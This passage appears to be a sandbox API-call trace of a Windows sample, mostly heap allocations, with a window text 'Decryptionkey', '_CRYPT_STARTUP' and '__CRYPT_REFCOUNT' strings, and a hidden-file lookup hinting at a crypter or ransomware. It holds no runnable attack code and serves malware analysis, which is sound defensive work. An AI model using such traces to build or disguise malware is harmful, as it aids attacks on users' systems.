1 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5d0 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe532c0 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d760 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6528 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53180 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6678 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53170 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40ef0 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53160 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe72c60 [0250.161] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x80) returned 0xc414a8 [0250.161] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c60 | out: hHeap=0xbe0000) returned 1 [0250.161] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0250.161] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0250.161] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40ef0 | out: hHeap=0xbe0000) returned 1 [0250.161] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53170 | out: hHeap=0xbe0000) returned 1 [0250.161] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53180 | out: hHeap=0xbe0000) returned 1 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe53180 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53170 [0250.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8808 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53150 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40ef0 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a30 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53140 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe72c60 [0250.162] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a30 | out: hHeap=0xbe0000) returned 1 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a30 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x80) returned 0xc41530 [0250.162] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c60 | out: hHeap=0xbe0000) returned 1 [0250.162] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a30 | out: hHeap=0xbe0000) returned 1 [0250.162] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40ef0 | out: hHeap=0xbe0000) returned 1 [0250.162] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53150 | out: hHeap=0xbe0000) returned 1 [0250.162] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53170 | out: hHeap=0xbe0000) returned 1 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe53170 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a30 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53150 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d490 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b38 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53130 [0250.162] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53130 | out: hHeap=0xbe0000) returned 1 [0250.162] SendMessageW (hWnd=0x2015e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xd [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1c) returned 0xe3d8f0 [0250.162] GetWindowTextW (in: hWnd=0x2015e, lpString=0xe3d8f0, nMaxCount=14 | out: lpString="Decryptionkey") returned 13 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c10 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d940 [0250.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53130 [0250.162] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8f0 | out: hHeap=0xbe0000) returned 1 [0250.163] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b38 | out: hHeap=0xbe0000) returned 1 [0250.163] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d490 | out: hHeap=0xbe0000) returned 1 [0250.163] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53150 | out: hHeap=0xbe0000) returned 1 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe53150 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b38 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53120 [0250.163] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53120 | out: hHeap=0xbe0000) returned 1 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf6498 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d490 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf64c8 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53120 [0250.163] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf64c8 | out: hHeap=0xbe0000) returned 1 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8f0 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf64c8 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8be0 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d968 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8910 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53110 [0250.163] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8910 | out: hHeap=0xbe0000) returned 1 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe72c60 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8910 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf63d8 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d990 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b68 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53100 [0250.163] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b68 | out: hHeap=0xbe0000) returned 1 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d9b8 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b68 [0250.163] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8820 [0250.164] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d9e0 [0250.164] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b20 [0250.164] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe530f0 [0250.164] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8940 [0250.164] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01970 [0250.164] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0250.164] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3da08 [0250.164] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c28 [0250.164] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe530e0 [0250.164] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c28 | out: hHeap=0xbe0000) returned 1 [0250.164] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3da30 [0250.164] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c28 [0250.164] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8958 [0250.164] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe530d0 [0250.165] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8958 | out: hHeap=0xbe0000) returned 1 [0250.165] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe530d0 | out: hHeap=0xbe0000) returned 1 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3da58 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8958 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe530d0 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6708 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf65e8 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe530c0 [0250.165] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf65e8 | out: hHeap=0xbe0000) returned 1 [0250.165] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe530c0 | out: hHeap=0xbe0000) returned 1 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3da80 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf65e8 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe530c0 [0250.165] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf65e8 | out: hHeap=0xbe0000) returned 1 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3daa8 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf65e8 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b08 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe530b0 [0250.165] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b08 | out: hHeap=0xbe0000) returned 1 [0250.165] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe530b0 | out: hHeap=0xbe0000) returned 1 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dad0 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b08 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe530b0 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a48 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8988 [0250.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe530a0 [0250.166] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8988 | out: hHeap=0xbe0000) returned 1 [0250.166] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe530a0 | out: hHeap=0xbe0000) returned 1 [0250.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3daf8 [0250.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8988 [0250.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe530a0 [0250.166] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8988 | out: hHeap=0xbe0000) returned 1 [0250.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3db20 [0250.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8988 [0250.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6438 [0250.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53090 [0250.166] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6438 | out: hHeap=0xbe0000) returned 1 [0250.166] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53090 | out: hHeap=0xbe0000) returned 1 [0250.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3db48 [0250.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6438 [0250.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53090 [0250.166] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6438 | out: hHeap=0xbe0000) returned 1 [0250.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3db70 [0250.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6438 [0250.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6618 [0250.166] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53080 [0250.167] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6618 | out: hHeap=0xbe0000) returned 1 [0250.167] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3db98 [0250.167] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6618 [0250.167] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53070 [0250.167] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6558 [0250.167] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53070 | out: hHeap=0xbe0000) returned 1 [0250.167] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370", lpFindFileData=0x8bf0f8 | out: lpFindFileData=0x8bf0f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33446080, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x33446080, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x3346c1e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0xd, dwReserved1=0xbe75d8, cFileName="26207383702620738370", cAlternateFileName="262073~1")) returned 0xe74ce0 [0250.167] FindClose (in: hFindFile=0xe74ce0 | out: hFindFile=0xe74ce0) returned 1 [0250.167] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6558 | out: hHeap=0xbe0000) returned 1 [0250.167] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6618 | out: hHeap=0xbe0000) returned 1 [0250.167] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3db98 | out: hHeap=0xbe0000) returned 1 [0250.167] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53080 | out: hHeap=0xbe0000) returned 1 [0250.167] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3db98 [0250.167] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6618 [0250.167] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53080 [0250.167] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6558 [0250.167] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8898 [0250.167] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53070 [0250.168] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8898 | out: hHeap=0xbe0000) returned 1 [0250.168] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53070 | out: hHeap=0xbe0000) returned 1 [0250.168] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dbc0 [0250.168] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8898 [0250.168] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53070 [0250.168] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6348 [0250.168] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8850 [0250.168] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53060 [0250.168] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8850 | out: hHeap=0xbe0000) returned 1 [0250.168] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53060 | out: hHeap=0xbe0000) returned 1 [0250.168] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0250.168] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53060 [0250.168] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dbe8 [0250.168] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0250.168] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dbe8 | out: hHeap=0xbe0000) returned 1 [0250.168] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53060 | out: hHeap=0xbe0000) returned 1 [0250.168] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf8850 [0250.168] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe019b8 [0250.168] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0250.168] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53060 [0250.168] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53050 [0250.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xe72c98 [0250.169] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.169] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe72c98 | out: hHeap=0xbe0000) returned 1 [0250.169] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53050 | out: hHeap=0xbe0000) returned 1 [0250.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf8868 [0250.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe01a00 [0250.169] PeekMessageW (in: lpMsg=0x8bf034, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf034) returned 0 [0250.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53050 [0250.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53040 [0250.169] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53040 | out: hHeap=0xbe0000) returned 1 [0250.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6318 [0250.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf62b8 [0250.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87c0 [0250.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53040 [0250.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87d8 [0250.169] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53050 | out: hHeap=0xbe0000) returned 1 [0250.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6288 [0250.169] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87d8 | out: hHeap=0xbe0000) returned 1 [0250.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87d8 [0250.169] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6288 | out: hHeap=0xbe0000) returned 1 [0250.169] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe01a00 | out: hHeap=0xbe0000) returned 1 [0250.169] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8868 | out: hHeap=0xbe0000) returned 1 [0250.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53050 [0250.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40ef0 [0250.170] GetLastError () returned 0x0 [0250.170] SetLastError (dwErrCode=0x0) [0250.170] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87d8 | out: hHeap=0xbe0000) returned 1 [0250.170] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40ef0 | out: hHeap=0xbe0000) returned 1 [0250.170] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53050 | out: hHeap=0xbe0000) returned 1 [0250.170] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53060 | out: hHeap=0xbe0000) returned 1 [0250.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe74ce0 [0250.170] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0250.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dbe8 [0250.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87d8 [0250.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53060 [0250.170] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf87d8 | out: hHeap=0xbe0000) returned 1 [0250.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dc10 [0250.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf87d8 [0250.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8868 [0250.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53050 [0250.170] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8868 | out: hHeap=0xbe0000) returned 1 [0250.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dc38 [0250.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8868 [0250.171] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53030 [0250.171] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6288 [0250.171] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53030 | out: hHeap=0xbe0000) returned 1 [0250.171] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0250.174] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3dc60 [0250.175] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53030 [0250.175] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6288 | out: hHeap=0xbe0000) returned 1 [0250.175] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8868 | out: hHeap=0xbe0000) returned 1 [0250.175] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3dc38 | out: hHeap=0xbe0000) returned 1 [0250.175] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53050 | out: hHeap=0xbe0000) returned 1 [0250.175] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf454) returned 0 [0250.175] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53050 [0250.175] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53020 [0250.175] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53010 [0250.175] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40ef0 [0250.175] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53010 | out: hHeap=0xbe0000) returned 1 [0250.175] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40ef0 | out: hHeap=0xbe0000) returned 1 [0250.175] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53020 | out: hHeap=0xbe0000) returned 1 [0250.175] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53050 | out: hHeap=0xbe0000) returned 1 [0250.175] PeekMessageW (in: lpMsg=0x8bf454, hWnd=0x0, wMsgFilterMin=0x0, 